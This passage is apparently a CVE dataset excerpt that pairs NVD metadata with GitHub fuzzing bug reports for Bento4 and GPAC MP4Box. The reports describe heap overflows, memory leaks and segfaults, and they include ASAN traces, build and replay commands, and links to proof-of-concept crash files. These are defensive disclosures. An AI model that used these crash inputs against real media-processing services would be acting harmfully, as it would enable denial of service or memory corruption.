AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #14 0x577862 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #15 0x577862 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #16 0x5785a6 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #17 0x507f53 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #18 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #19 0x5aea82 in AP4_DrefAtom::AP4_DrefAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:84 #20 0x5aeff7 in AP4_DrefAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4DrefAtom.cpp:50 #21 0x509882 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:580 #22 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #23 0x577862 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #24 0x577862 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #25 0x5785a6 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #26 0x507f53 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #27 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #28 0x577862 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #29 0x577862 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #30 0x5785a6 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #31 0x507f53 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #32 0x50ecb6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #33 0x577862 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #34 0x577862 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #35 0x5785a6 in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #36 0x507f53 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #37 0x50dd7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #38 0x50dd7a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #39 0x418daf in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104 #40 0x418daf in AP4_File::AP4_File(AP4_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78 #41 0x4040d7 in main /root/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:250 #42 0x7ffff61bb83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #43 0x408508 in _start (/root/Bento4/mp42aac+0x408508) 0x60300000ed28 is located 0 bytes to the right of 24-byte region [0x60300000ed10,0x60300000ed28) allocated by thread T0 here: #0 0x7ffff6f03712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x4147b5 in AP4_DataBuffer::AP4_DataBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:55 #2 0x17 (<unknown module>) SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Dec3Atom.cpp:161 AP4_Dec3Atom::AP4_Dec3Atom(unsigned int, unsigned char const*) Shadow bytes around the buggy address: 0x0c067fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff9d90: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 fa =>0x0c067fff9da0: fa fa 00 00 00[fa]fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9db0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9dc0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff9dd0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff9de0: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff9df0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==27304==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-hbo-00 ### Validation steps git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac mp42aac-hbo-00 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/762/comments
0
2022-09-19T06:13:40Z
2022-09-19T06:18:56Z
https://github.com/axiomatic-systems/Bento4/issues/762
1,377,452,573
762
CVE-2022-43037
2022-10-19T14:15:10.043
An issue was discovered in Bento4 1.6.0-639. There is a memory leak in the function AP4_File::ParseStream in /Core/Ap4File.cpp.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/788" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/788
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42aac instrumented with ASAN. There are some inputs causing memory leaks. Here is the ASAN mode output. The output is different from #763. ================================================================= ==6659==ERROR: LeakSanitizer: detected memory leaks Direct leak of 64 byte(s) in 1 object(s) allocated from: #0 0x7f8d891f0592 in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99592) #1 0x418dff in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:108 #2 0x418dff in AP4_File::AP4_File(AP4_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78 SUMMARY: AddressSanitizer: 64 byte(s) leaked in 1 allocation(s). ### Crash Input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42aac-ml-01 ### Verification steps: git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42aac mp42aac-ml-01 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Memory leaks with ASAN in mp42aac
https://api.github.com/repos/axiomatic-systems/Bento4/issues/788/comments
0
2022-10-04T06:40:25Z
2023-05-29T02:51:19Z
https://github.com/axiomatic-systems/Bento4/issues/788
1,395,742,603
788
CVE-2022-43038
2022-10-19T14:15:10.090
Bento4 v1.6.0-639 was discovered to contain a heap overflow via the AP4_BitReader::ReadCache() function in mp42ts.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/787" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:1.6.0-639:*:*:*:*:*:*:*", "matchCriteriaId": "A003FBD1-339C-409D-A304-7FEE97E23250", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/axiomatic-systems/Bento4/issues/787
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi, developers of Bento4: In the test of the binary mp42ts instrumented with ASAN. There are some inputs causing heap-buffer-overflow. Here is the ASAN mode output. The output is different from #764 ================================================================= ==3902==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60400000df38 at pc 0x0000004a51a6 bp 0x7ffc109910f0 sp 0x7ffc109910e0 READ of size 1 at 0x60400000df38 thread T0 #0 0x4a51a5 in AP4_BitReader::ReadCache() const /root/Bento4/Source/C++/Core/Ap4Utils.cpp:447 #1 0x4a51a5 in AP4_BitReader::ReadBits(unsigned int) /root/Bento4/Source/C++/Core/Ap4Utils.cpp:467 #2 0x5405fc in AP4_Dac4Atom::AP4_Dac4Atom(unsigned int, unsigned char const*) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:313 #3 0x5423a2 in AP4_Dac4Atom::Create(unsigned int, AP4_ByteStream&) /root/Bento4/Source/C++/Core/Ap4Dac4Atom.cpp:58 #4 0x4f47c5 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:776 #5 0x4f955a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #6 0x51a25e in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #7 0x487d31 in AP4_SampleEntry::Read(AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:115 #8 0x487d31 in AP4_AudioSampleEntry::AP4_AudioSampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:420 #9 0x487d31 in AP4_Ac4SampleEntry::AP4_Ac4SampleEntry(unsigned int, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4SampleEntry.cpp:801 #10 0x4f1aad in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:342 #11 0x4f955a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #12 0x6134a9 in AP4_StsdAtom::AP4_StsdAtom(unsigned int, unsigned char, unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:101 #13 0x61534b in AP4_StsdAtom::Create(unsigned int, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4StsdAtom.cpp:57 #14 0x4f55a6 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:458 #15 0x4f955a in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #16 0x5181d5 in AP4_ContainerAtom::ReadChildren(AP4_AtomFactory&, AP4_ByteStream&, unsigned long long) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:194 #17 0x5181d5 in AP4_ContainerAtom::AP4_ContainerAtom(unsigned int, unsigned long long, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:139 #18 0x518fce in AP4_ContainerAtom::Create(unsigned int, unsigned long long, bool, bool, AP4_ByteStream&, AP4_AtomFactory&) /root/Bento4/Source/C++/Core/Ap4ContainerAtom.cpp:88 #19 0x4f2b69 in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned int, unsigned int, unsigned long long, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:816 #20 0x4f865c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, unsigned long long&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:234 #21 0x4f865c in AP4_AtomFactory::CreateAtomFromStream(AP4_ByteStream&, AP4_Atom*&) /root/Bento4/Source/C++/Core/Ap4AtomFactory.cpp:154 #22 0x41c87f in AP4_File::ParseStream(AP4_ByteStream&, AP4_AtomFactory&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:104 #23 0x41c87f in AP4_File::AP4_File(AP4_ByteStream&, bool) /root/Bento4/Source/C++/Core/Ap4File.cpp:78 #24 0x40441f in main /root/Bento4/Source/C++/Apps/Mp42Ts/Mp42Ts.cpp:511 #25 0x7fb1c343783f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f) #26 0x40ad98 in _start (/root/Bento4/mp42ts+0x40ad98) 0x60400000df38 is located 0 bytes to the right of 40-byte region [0x60400000df10,0x60400000df38) allocated by thread T0 here: #0 0x7fb1c417f712 in operator new[](unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x99712) #1 0x4199e5 in AP4_DataBuffer::ReallocateBuffer(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:210 #2 0x4199e5 in AP4_DataBuffer::SetBufferSize(unsigned int) /root/Bento4/Source/C++/Core/Ap4DataBuffer.cpp:136 SUMMARY: AddressSanitizer: heap-buffer-overflow /root/Bento4/Source/C++/Core/Ap4Utils.cpp:447 AP4_BitReader::ReadCache() const Shadow bytes around the buggy address: 0x0c087fff9b90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9ba0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bb0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c087fff9be0: fa fa 00 00 00 00 00[fa]fa fa 00 00 00 00 06 fa 0x0c087fff9bf0: fa fa 00 00 00 00 06 fa fa fa 00 00 00 00 00 00 0x0c087fff9c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c087fff9c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==3902==ABORTING ### Crash input https://github.com/17ssDP/fuzzer_crashes/blob/main/Bento4/mp42ts-hbo-01 ### Validation steps git clone https://github.com/axiomatic-systems/Bento4 cd Bento4/ mkdir check_build && cd check_build cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" -DCMAKE_BUILD_TYPE=Release make -j ./mp42ts mp42ts-hbo-01 /dev/null ### Environment Ubuntu 16.04 Clang 10.0.1 gcc 5.5
Heap-buffer-overflow with ASAN in mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/787/comments
0
2022-10-04T06:36:03Z
2023-05-29T02:51:18Z
https://github.com/axiomatic-systems/Bento4/issues/787
1,395,738,652
787
CVE-2022-43039
2022-10-19T14:15:10.137
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_meta_restore_items_ref at /isomedia/meta.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2281" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2281
[ "Exploit", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description SEGV in isomedia/meta.c:1929 in gf_isom_meta_restore_items_ref ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -info mp4box-info-segv-0 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-info-segv-0 ### ASAN ``` [iso file] Read Box type 0003E8d (0x0003E864) at position 653 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Missing DataInformationBox [iso file] Box "minf" (start 645) has 3400 extra bytes [iso file] Track with no sample table ! [iso file] Track with no sample description box ! [isom] not enough bytes in box A9too: 29 left, reading 41 (file isomedia/box_code_apple.c, line 117) [iso file] Read Box "A9too" (start 4122) failed (Invalid IsoMedia File) - skipping [iso file] Read Box "ilst" (start 4114) failed (Invalid IsoMedia File) - skipping [iso file] Read Box type 000000! (0x00000021) at position 4077 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "meta" (start 4069) has 74 extra bytes ASAN:DEADLYSIGNAL ================================================================= ==57686==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002c (pc 0x7fb4c621a438 bp 0x000000000000 sp 0x7fff370fe330 T0) ==57686==The signal is caused by a READ memory access. ==57686==Hint: address points to the zero page. #0 0x7fb4c621a437 in gf_isom_meta_restore_items_ref isomedia/meta.c:1929 #1 0x7fb4c60c4127 in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:429 #2 0x7fb4c60d00e5 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:866 #3 0x7fb4c60d00e5 in gf_isom_open_file isomedia/isom_intern.c:986 #4 0x5627a34e0048 in mp4box_main /gpac/applications/mp4box/mp4box.c:6175 #5 0x7fb4c5089c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #6 0x5627a34b30a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:1929 in gf_isom_meta_restore_items_ref ==57686==ABORTING ``` ### Environment ``` Ubuntu 16.04 Clang 10.0.1 gcc 5.5 ```
SEGV isomedia/meta.c:1929 in gf_isom_meta_restore_items_ref
https://api.github.com/repos/gpac/gpac/issues/2281/comments
0
2022-10-09T08:34:59Z
2022-10-10T15:44:28Z
https://github.com/gpac/gpac/issues/2281
1,402,199,623
2,281
CVE-2022-43040
2022-10-19T14:15:10.183
GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a heap buffer overflow via the function gf_isom_box_dump_start_ex at /isomedia/box_funcs.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2280" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2280
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
### Description Heap-buffer-overflow in isomedia/box_funcs.c:2074 in gf_isom_box_dump_start_ex ### Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` ### Replay ``` git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -diso mp4box-diso-heap-buffer-over-flow-1 ``` ### POC https://github.com/17ssDP/fuzzer_crashes/blob/main/gpac/mp4box-diso-heap-buffer-over-flow-1 ### ASAN ``` [iso file] Read Box type 04@0004 (0x04400004) at position 94 has size 0 but is not at root/file level. Forbidden, skipping end of parent box ! [iso file] Box "meta" (start 32) has 206 extra bytes [iso file] Box "uuid" (start 4061) has 58 extra bytes [iso file] Incomplete box mdat - start 4151 size 54847 [iso file] Incomplete file while reading for dump - aborting parsing ================================================================= ==18099==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000000540 at pc 0x7f54a04dd880 bp 0x7ffcec3ea7e0 sp 0x7ffcec3ea7d0 READ of size 1 at 0x604000000540 thread T0 #0 0x7f54a04dd87f in gf_isom_box_dump_start_ex isomedia/box_funcs.c:2074 #1 0x7f54a04dd87f in gf_isom_box_dump_start isomedia/box_funcs.c:2093 #2 0x7f54a04c0ae7 in trgt_box_dump isomedia/box_dump.c:5807 #3 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108 #4 0x7f54a0470ffa in gf_isom_box_array_dump isomedia/box_dump.c:104 #5 0x7f54a04ddda8 in gf_isom_box_dump_done isomedia/box_funcs.c:2115 #6 0x7f54a04c09d5 in trgr_box_dump isomedia/box_dump.c:5799 #7 0x7f54a04ddbb8 in gf_isom_box_dump isomedia/box_funcs.c:2108 #8 0x7f54a04714d6 in gf_isom_dump isomedia/box_dump.c:138 #9 0x55e8639f1804 in dump_isom_xml /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:2067 #10 0x55e8639c1d79 in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6364 #11 0x7f549f4e0c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #12 0x55e8639920a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9) 0x604000000540 is located 0 bytes to the right of 48-byte region [0x604000000510,0x604000000540) allocated by thread T0 here: #0 0x7f54a2a4cb40 in 